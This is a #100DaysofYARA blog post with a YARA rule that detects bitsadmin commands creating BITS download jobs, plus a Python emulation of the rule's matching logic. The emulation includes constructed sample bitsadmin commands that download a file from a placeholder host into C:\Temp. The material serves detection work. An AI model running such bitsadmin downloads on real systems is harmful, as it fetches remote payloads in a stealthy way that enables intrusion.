#100DaysofYARA 2024 – Day 50 – Bitsadmin Downloads

We’re halfway through the 100 days! Microsoft’s Background Intelligent Transfer Service (BITS) can be used to proxy execution of binaries or to execute from an Alternate Data Stream, but it is more commonly abused to download files from an external host.

rule TTP_BITS_Download_command {
	meta:
		description = "Matches strings commonly found when creating new BITS download jobs."
		last_modified = "2024-02-19"
		author = "@petermstewart"
		DaysofYara = "50/100"
		ref = "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"

	strings:
		$a = "bitsadmin /create" nocase ascii wide
		$b = "/addfile" nocase ascii wide
		$c = "/complete" nocase ascii wide
		$d = "http" nocase ascii wide

	condition:
		all of them
}
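
To show how the `nocase ascii wide` modifiers and the `all of them` condition behave together, here is an added example (not part of the original post or the author's repository) that emulates the rule's matching logic in plain Python rather than running the YARA engine. The sample scripts, job names, paths and the `example.test` host are constructed for illustration.

```python
import re

# Strings copied from TTP_BITS_Download_command; every one is `nocase ascii wide`.
RULE_STRINGS = {
    "$a": "bitsadmin /create",
    "$b": "/addfile",
    "$c": "/complete",
    "$d": "http",
}

def compile_string(text):
    """Regex equivalent of `nocase ascii wide`: ASCII bytes or the same
    characters interleaved with NUL bytes (UTF-16LE), ignoring case."""
    ascii_form = re.escape(text.encode("ascii"))
    wide_form = re.escape(text.encode("utf-16-le"))
    return re.compile(b"(?:" + ascii_form + b"|" + wide_form + b")", re.IGNORECASE)

PATTERNS = {name: compile_string(text) for name, text in RULE_STRINGS.items()}

def evaluate(data):
    """Return which of the rule's strings occur in `data` (bytes)."""
    return {name: bool(p.search(data)) for name, p in PATTERNS.items()}

def rule_matches(data):
    """The rule's condition, `all of them`."""
    return all(evaluate(data).values())

# Constructed samples (not from the original post); example.test is a reserved name.
DOWNLOAD_SCRIPT = (
    "BitsAdmin /Create job1\r\n"
    "bitsadmin /AddFile job1 https://example.test/file.bin C:\\Temp\\file.bin\r\n"
    "bitsadmin /resume job1\r\n"
    "bitsadmin /complete job1\r\n"
)
LOCAL_COPY_SCRIPT = (
    "bitsadmin /create job2\r\n"
    "bitsadmin /addfile job2 C:\\Temp\\a.bin C:\\Temp\\b.bin\r\n"
    "bitsadmin /complete job2\r\n"
)
SAMPLES = {
    "download, ASCII": DOWNLOAD_SCRIPT.encode("ascii"),
    "download, UTF-16LE": DOWNLOAD_SCRIPT.encode("utf-16-le"),
    "local copy, ASCII": LOCAL_COPY_SCRIPT.encode("ascii"),
}

if __name__ == "__main__":
    for label, data in SAMPLES.items():
        print(f"{label}: match={rule_matches(data)} {evaluate(data)}")
```

Because `$d` is a bare substring, `https` URLs satisfy it as well, while the local-copy sample fails the condition only on `$d`.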

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my GitHub repository.
